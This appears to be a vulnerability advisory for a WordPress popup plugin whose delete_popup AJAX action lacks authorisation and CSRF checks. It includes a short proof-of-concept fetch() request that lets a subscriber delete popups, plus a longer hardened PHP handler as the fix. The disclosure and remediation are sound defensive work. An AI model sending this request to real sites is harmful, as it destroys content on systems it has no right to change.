The plugin does not perform authorisation or CSRF checks in an AJAX action, allowing any authenticated user, such as a subscriber, to delete arbitrary popups.
// Request issued from a logged-in subscriber session; bid is the ID of the popup to delete.
fetch('/wordpress/wp-admin/admin-ajax.php?action=delete_popup', {
  method: 'POST',
  headers: { "content-type": "application/x-www-form-urlencoded" },
  body: "bid=1",
})
  .then(response => response.text())
  .then(data => console.log(data));
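A hardened form of such a handler, as an added example (not the plugin's own code). It assumes popups are stored as posts of a hypothetical `example_popup` post type; the `example_*` names, the `nonce` field, the `example-popup-admin` script handle and the `manage_options` capability are illustrative choices.

```php
<?php
// Added example, not the plugin's code. Assumed (hypothetical) names:
// post type 'example_popup', nonce action 'example_delete_popup',
// request field 'nonce', script handle 'example-popup-admin'.

// Register only the authenticated hook. No wp_ajax_nopriv_ hook is added,
// so logged-out visitors never reach the handler.
add_action( 'wp_ajax_delete_popup', 'example_ajax_delete_popup' );

function example_ajax_delete_popup() {
    // CSRF check: the request must carry a nonce issued for this action.
    // Third argument false makes the call return false instead of dying,
    // so a JSON error can be sent.
    if ( ! check_ajax_referer( 'example_delete_popup', 'nonce', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid nonce' ), 403 );
    }

    // Authorisation check: wp_ajax_* only proves the caller is logged in,
    // which includes subscribers. Require an administrative capability.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }

    // Validate the ID and confirm it refers to a popup, not another post.
    $popup_id = isset( $_POST['bid'] ) ? absint( wp_unslash( $_POST['bid'] ) ) : 0;
    if ( 0 === $popup_id || 'example_popup' !== get_post_type( $popup_id ) ) {
        wp_send_json_error( array( 'message' => 'Popup not found' ), 404 );
    }

    if ( ! wp_delete_post( $popup_id, true ) ) {
        wp_send_json_error( array( 'message' => 'Delete failed' ), 500 );
    }
    wp_send_json_success( array( 'deleted' => $popup_id ) );
}

// Hand the nonce to the admin-side script, and only to users who may delete.
// Assumes the 'example-popup-admin' script is already enqueued.
add_action( 'admin_enqueue_scripts', function () {
    if ( current_user_can( 'manage_options' ) ) {
        wp_localize_script( 'example-popup-admin', 'ExamplePopup', array(
            'nonce' => wp_create_nonce( 'example_delete_popup' ),
        ) );
    }
} );
```

With both checks in place, the request shown above is rejected with a 403: it carries no nonce, and a subscriber lacks the required capability.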
Krzysztof Zając
Yes
2022-09-05 (about 8 months ago)
2022-09-30 (about 7 months ago)